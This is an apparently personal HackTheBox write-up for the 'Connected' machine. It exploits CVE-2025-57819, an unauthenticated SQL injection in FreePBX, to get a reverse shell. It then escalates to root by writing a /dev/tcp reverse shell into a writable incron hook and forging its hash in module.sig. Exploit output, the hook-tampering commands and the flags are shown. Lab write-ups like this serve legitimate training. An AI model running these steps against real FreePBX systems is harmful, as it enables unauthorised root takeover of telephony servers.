← back to all writeups

Connected

Linux Easy Pwned: 2026-06-07

Machine Info

FieldDetails
Machine NameConnected
OSLinux
DifficultyEasy
StatusPwned

Tools Used


Summary

Brief summary of the machine, attack path, and key vulnerabilities exploited.


Reconnaissance

Initial Scan (NMAP)

Initial scan reveals that the target is running FreePBX 16.0.40.7 which is vulnerable to unauthenticated SQLi via /admin/ajax.php.

┌──(kali㉿kali)-[~/HTB/Connected/recon]
└─$ nmap -sC -sV -A 10.129.82.248 -oN scan.txt
Starting Nmap 7.98 ( https://nmap.org ) at 2026-06-07 02:11 -0400
Nmap scan report for connected.htb (10.129.82.248)
Host is up (0.21s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 4e:60:38:6f:e7:78:6c:ca:58:62:a1:f1:56:ae:8d:30 (RSA)
|   256 12:41:55:26:9d:ad:3d:e8:bf:4e:31:aa:d7:d1:a5:d2 (ECDSA)
|_  256 8e:b6:96:e0:21:83:5d:1d:ce:8d:e2:6a:dd:38:c6:75 (ED25519)
80/tcp  open  http     Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/7.4.16)
| http-robots.txt: 1 disallowed entry 
|_/
| http-title: 404 Not Found
|_Requested resource was config.php
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.16
443/tcp open  ssl/http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/7.4.16)
|_http-title: 400 Bad Request
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.16
| ssl-cert: Subject: commonName=pbxconnect/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2025-11-30T14:07:27
|_Not valid after:  2026-11-30T14:07:27
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (97%), MikroTik RouterOS 7.X (95%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:6.0
Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Linux 5.0 - 5.14 (97%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (95%), Linux 2.6.32 - 3.13 (91%), Linux 3.2 - 4.14 (91%), Linux 2.6.32 - 3.10 (91%), Linux 4.19 - 5.15 (91%), Linux 3.10 - 4.11 (90%), Linux 3.4 - 3.10 (90%), Linux 4.15 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   200.98 ms 10.10.14.1
2   204.06 ms connected.htb (10.129.82.248)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 122.70 seconds

Open Ports:

PortServiceVersionNotes
22SSH
80/443HTTP FreePBX16.0.40.7Vuln to (CVE-2025-57819)

Vulnerability Identification

Identified Technologies

TechnologyVersionNotes
FreePBX16.0.40.7

CVEs / Vulnerabilities Identified

CVEDescriptionSeverity
CVE-2025-57819Gives unauthenticated SQLi access via /admin/ajax.phpCritical

Initial Foothold / Initial Access

CVE-2025-57819

We know that the FreePBX PHP endpoints within the main directory /admin/ that can be reached are: /admin/ajax.php & /admin/config.php

We poked at /admin/ajax.php to see if it was reachable without a session. Short answer: no. After researching more on the CVE, we find a documentation breaking down how the CVE can be used to execute remote code, along with a Detection artifact generator tool which creates a new user row within the database through SQLi if the reverse shell upload fails. Reference: watchtowr.

┌──(kali㉿kali)-[~/HTB/Connected/CVE-2025-57819-poc]
└─$ python3 exploit.py connected.htb
[*] Listener address: 10.10.14.78:4444 (iface tun0)
[*] Confirming SQLi on http://connected.htb ...
[+] Vulnerable! DB version: 5.5.65-MariaDB
[*] Listening on 0.0.0.0:4444
[*] Injecting reverse-shell cron job ...
[+] Cron job 'jofgrmkc' inserted (runs every minute).
[*] Waiting for callback (up to ~70s) ...
[+] Shell from 10.129.213.89:53596 !
[+] Removed cron job 'jofgrmkc' (no repeat callbacks).
--- interactive shell (Ctrl-C to quit) ---
bash: no job control in this shell
______                   ______ ______ __   __
|  ___|                  | ___ \| ___ \\ \ / /                                   
| |_    _ __   ___   ___ | |_/ /| |_/ / \ V /                                    
|  _|  | '__| / _ \ / _ \|  __/ | ___ \ /   \                                    
| |    | |   |  __/|  __/| |    | |_/ // /^\ \                                   
\_|    |_|    \___| \___|\_|    \____/ \/   \/                                   
                                                                                 
                                                                                 
NOTICE! You have 3 notifications! Please log into the UI to see them!            
Current Network Configuration
+-----------+-------------------+---------------------------+
| Interface | MAC Address       | IP Addresses              |
+-----------+-------------------+---------------------------+
| eth0      | 00:50:56:95:D7:FD | 10.129.213.89             |
|           |                   | fe80::82bd:1bcb:a990:dd3b |
+-----------+-------------------+---------------------------+

Running the exploit returns a reverse shell as the user asterisk.


User Flag

[asterisk@connected ~]$ cat user.txt
cat user.txt
78f2cd57ec06cccdbca49238ad0b0952

Privilege Escalation

Enumeration

Uploading LinPeas on the FreePBX machine and running it reveals that there is a Critical misconfiguration in the Incron service.

Writable icnron spool directory:

drwxrwxrwx. 2 asterisk asterisk 6 Apr 15 2021 /usr/local/asterisk/incron

Incron rules running as root:

/var/spool/asterisk/incron IN_MODIFY,IN_ATTRIB,IN_CLOSE_WRITE /usr/bin/sysadmin_manager $#

The incron watches are triggered as root. If the asterisk user can write to /var/spool/asterisk/sysadmin/ (highly likely given the writable file listing), writing a file there triggers a root-executed command.

Reading /usr/bin/sysadmin_manager (a PHP script intentionally left unencoded by Sangoma) revealed the execution flow:

cat /etc/incron.d/* 2>/dev/null
---SNIP---
/usr/local/asterisk/incron IN_CLOSE_WRITE /usr/bin/sysadmin_manager --local $#
/var/spool/asterisk/incron IN_MODIFY,IN_ATTRIB,IN_CLOSE_WRITE /usr/bin/sysadmin_manager $#
---SNIP---

Reading the code carefully revealed the check verifies that module.sig is signed by a whitelisted Sangoma key — but it does not verify that module.sig itself is unmodified after signature verification. The GPG signature only needs to be present and valid for the file as originally signed.

However the actual bypass was simpler: both module.sig and the hook files for the cdrpro module were writable by the asterisk user:

find /var/www/html/admin/modules/*/hooks/ -writable 2>/dev/null
# Returns: /var/www/html/admin/modules/cdrpro/hooks/logrotate

ls -la /var/www/html/admin/modules/cdrpro/module.sig
# -rw-rw-r--. 1 asterisk asterisk 21384 Nov 2 2023 module.sig

Since asterisk could write to both the hook file and the sig file, the hash check could be defeated by updating the hash in module.sig to match a malicious hook.

Exploitation

We can write a reverse shell to the hook file and update the module.sig with the new hash.

asterisk@connected asterisk]$ cat > /var/www/html/admin/modules/cdrpro/hooks/logrotate << 'EOF'
#!/bin/bash
bash -i >& /dev/tcp/ATTACKERIP/5555 0>&1
EOF

[asterisk@connected asterisk]$ chmod +x /var/www/html/admin/modules/cdrpro/hooks/logrotate

[asterisk@connected asterisk]$ sha256sum /var/www/html/admin/modules/cdrpro/hooks/logrotate

074a8dd5556d5a68b78c4674d75a1edb7c77f5564d85ede40ba7d828740ab16e  /var/www/html/admin/modules/cdrpro/hooks/logrotate

[asterisk@connected asterisk]$ sed -i 's/hooks\/logrotate = .*/hooks\/logrotate = 074a8dd5556d5a68b78c4674d75a1edb7c77f5564d85ede40ba7d828740ab16e/' /var/www/html/admin/modules/cdrpro/module.sig

Starting a listener on our local machine and triggering the incron rule by creating the corresponding file returns a reverse shell as root.

#On FreePBX machine
touch /var/spool/asterisk/incron/cdrpro_logrotate
──(kali㉿kali)-[~/HTB/Connected/CVE-2021-4034]
└─$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.14.78] from (UNKNOWN) [10.129.213.89] 43712
bash: no job control in this shell
______                   ______ ______ __   __
|  ___|                  | ___ \| ___ \\ \ / /                                   
| |_    _ __   ___   ___ | |_/ /| |_/ / \ V /                                    
|  _|  | '__| / _ \ / _ \|  __/ | ___ \ /   \                                    
| |    | |   |  __/|  __/| |    | |_/ // /^\ \                                   
\_|    |_|    \___| \___|\_|    \____/ \/   \/                                   
[root@connected /]#

Root Flag

[root@connected /]# cat /root/root.txt
dc76a8a64d94a8d3cf4a27af7d11243d

Trophy

https://labs.hackthebox.com/achievement/machine/1574945/906

Completed as part of HackTheBox practice in a legal, controlled environment.